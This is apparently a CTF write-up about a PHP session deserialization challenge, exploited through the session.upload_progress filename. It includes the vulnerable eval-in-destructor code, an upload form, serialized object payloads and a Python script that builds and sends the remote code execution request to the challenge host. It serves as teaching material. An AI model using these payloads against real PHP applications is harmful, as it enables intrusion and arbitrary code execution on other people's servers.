[CTF][University War Epidemic] php-session deserialization problem

Pre-knowledge

Session storage mechanism

PHP does not keep session contents in memory: by default they are written to disk. Where and how they are stored is decided by the configuration item session.save_handler (the default is files), and the file is named sess_<sessionid> under session.save_path.
How the variables inside that file are encoded is a separate setting, session.serialize_handler, with three possible formats:

  • php: the default; each variable is stored as key name|value, with the value processed by the serialization function (serialize())
  • php_serialize: the whole $_SESSION array is stored as a single serialize() string
  • php_binary: one byte holding the length of the key name, then the key name, then the serialized value
For the attack technique itself (abusing session.upload_progress), read the freebuf article "Use session.upload_progress for file inclusion and deserialization penetration".

wp part

After opening the challenge and auditing the code, there are not many exploitable points. The one line that stands out is ini_set('session.serialize_handler', 'php'): the script decodes the session with the php handler (key name|value), but data written into the session before the script runs, such as upload-progress data, is encoded with whatever handler php.ini configures (visible as session.serialize_handler in phpinfo). If php.ini uses php_serialize, the two handlers disagree about where a value starts, and a | placed inside attacker-controlled session data turns everything after it into something unserialize() will happily turn into an object. That is the deserialization bug to look for here.

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');   // decode the session with the "php" handler (key|value)
session_start();                                // the session file is read and unserialized here
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }

    function __destruct()
    {
        eval($this->mdzz);                      // whatever mdzz holds runs when the object is destroyed
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();                           // ?phpinfo -> __destruct() -> phpinfo()
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

Next, open phpinfo (index.php?phpinfo) and look at session.upload_progress.enabled. When it is On, PHP records the progress of every multipart upload in the session (start time, bytes processed, and for each file its name): it is enough to POST a field named PHP_SESSION_UPLOAD_PROGRESS together with a file. The session key becomes session.upload_progress.prefix (upload_progress_ by default) followed by that field's value, and the uploaded file's filename is stored inside it, so the filename is our injection point into the session. Also check session.upload_progress.cleanup: when it is On, PHP removes the entry as soon as the upload completes, and the write has to be raced (a large or slow upload), which is not needed here.
Construct an upload form (the hidden field must be named PHP_SESSION_UPLOAD_PROGRESS; its value only picks the session key suffix):

<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data">
    <!-- value 777 becomes the session key upload_progress_777 -->
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="777" />
    <!-- the filename chosen for this file is what ends up in the session -->
    <input type="file" name="file" />
    <input type="submit" />
</form>

phpinfo also shows that system is listed in disable_functions, so instead of a shell command we use PHP's own functions to look around. The code goes into the mdzz property of a serialized OowoO object, and the whole thing must be prefixed with | so that the php handler treats it as the value part; the filename to upload for
print_r(scandir(dirname(__FILE__)));
is therefore
|O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
where s:36 is the byte length of the code (get it wrong and unserialize() fails). The double quotes inside the filename have to be escaped as \" in the multipart Content-Disposition header, otherwise the filename is cut short.
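The following Python script is an added example for this write-up, not code from the original post. It does two things the text above only describes: it builds the serialized OowoO filename with the correct string lengths and the multipart request that delivers it, and it shows in bytes why the leading | matters when the session was written with php_serialize but is read back with the php handler. The class and property names and the target URL are taken from the challenge above; the upload-progress session layout in php_serialize_session() is a simplified, constructed stand-in for PHP's real structure (only the prefix and the files[0]['name'] entry are modelled).

```python
"""
Added example (not from the original write-up): serialized OowoO payload,
php_serialize vs php handler mismatch, and the multipart request that delivers
the payload through session.upload_progress.
Assumptions: class/property names and TARGET come from the challenge above;
php_serialize_session() is a constructed sketch of PHP's progress structure.
"""
import urllib.request
import uuid

TARGET = "http://web.jarvisoj.com:32784/index.php"  # from the write-up
PROGRESS_FIELD = "777"  # value posted as PHP_SESSION_UPLOAD_PROGRESS; any string works


def php_str(s: str) -> str:
    """PHP serialize() form of a string: s:<byte length>:"<bytes>"; (length in bytes)."""
    return 's:%d:"%s";' % (len(s.encode()), s)


def oowoo_payload(php_code: str) -> str:
    """Serialized OowoO object; its __destruct() will eval() php_code."""
    return 'O:5:"OowoO":1:{' + php_str("mdzz") + php_str(php_code) + "}"


def injected_filename(php_code: str) -> str:
    """Filename to upload: the '|' is the php handler's key/value delimiter."""
    return "|" + oowoo_payload(php_code)


def php_serialize_session(filename: str, field: str = PROGRESS_FIELD) -> str:
    """Constructed sketch of what the php_serialize handler stores for one upload:
    the whole $_SESSION array as a single serialize() string (the key prefix and
    files[0]['name'] are real; the other progress fields are left out)."""
    file_entry = "a:1:{i:0;a:1:{" + php_str("name") + php_str(filename) + "}}"
    progress = "a:1:{" + php_str("files") + file_entry + "}"
    return "a:1:{" + php_str("upload_progress_" + field) + progress + "}"


def php_handler_split(blob: str):
    """How the php handler decodes the same bytes: everything before the first
    '|' is taken as the variable name, what follows is handed to unserialize()."""
    name, _, value = blob.partition("|")
    return name, value


def build_multipart(filename: str, field: str = PROGRESS_FIELD, boundary: str = None):
    """multipart/form-data body carrying the progress field and the booby-trapped
    filename. Double quotes in the filename are escaped as backslash-quote, which
    PHP's multipart parser unescapes again."""
    boundary = boundary or uuid.uuid4().hex
    escaped = filename.replace('"', '\\"')
    body = (
        "--%s\r\n" % boundary
        + 'Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"\r\n\r\n'
        + field + "\r\n"
        + "--%s\r\n" % boundary
        + 'Content-Disposition: form-data; name="file"; filename="%s"\r\n' % escaped
        + "Content-Type: application/octet-stream\r\n\r\n"
        + "x\r\n"  # the file content itself does not matter
        + "--%s--\r\n" % boundary
    )
    return "multipart/form-data; boundary=" + boundary, body.encode()


def send(php_code: str) -> str:
    """Fire the request; the output of the eval()'d code comes back in the body."""
    ctype, body = build_multipart(injected_filename(php_code))
    req = urllib.request.Request(TARGET, data=body, headers={"Content-Type": ctype})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    code = "print_r(scandir(dirname(__FILE__)));"
    blob = php_serialize_session(injected_filename(code))
    name, value = php_handler_split(blob)
    print("php_serialize wrote:", blob)
    print("php handler key    :", name)
    print("php handler value  :", value)  # starts with O:5:"OowoO", so the object is unserialized
    print(send(code))
```

Run it as a script to see the split and fire the request; the trailing bytes after the object (the closing quote and braces of the php_serialize array) are ignored by the php handler, because the object has already been unserialized by the time it looks for the next | and finds none.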
The script's own directory is shown on the phpinfo page under _SERVER["SCRIPT_FILENAME"], and the scandir() output lists the file holding the flag. Read it with the same OowoO wrapper, this time with the following code in mdzz (adjust the s: length accordingly):

print_r(file_get_contents("/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php"));
Origin blog.csdn.net/solitudi/article/details/108861664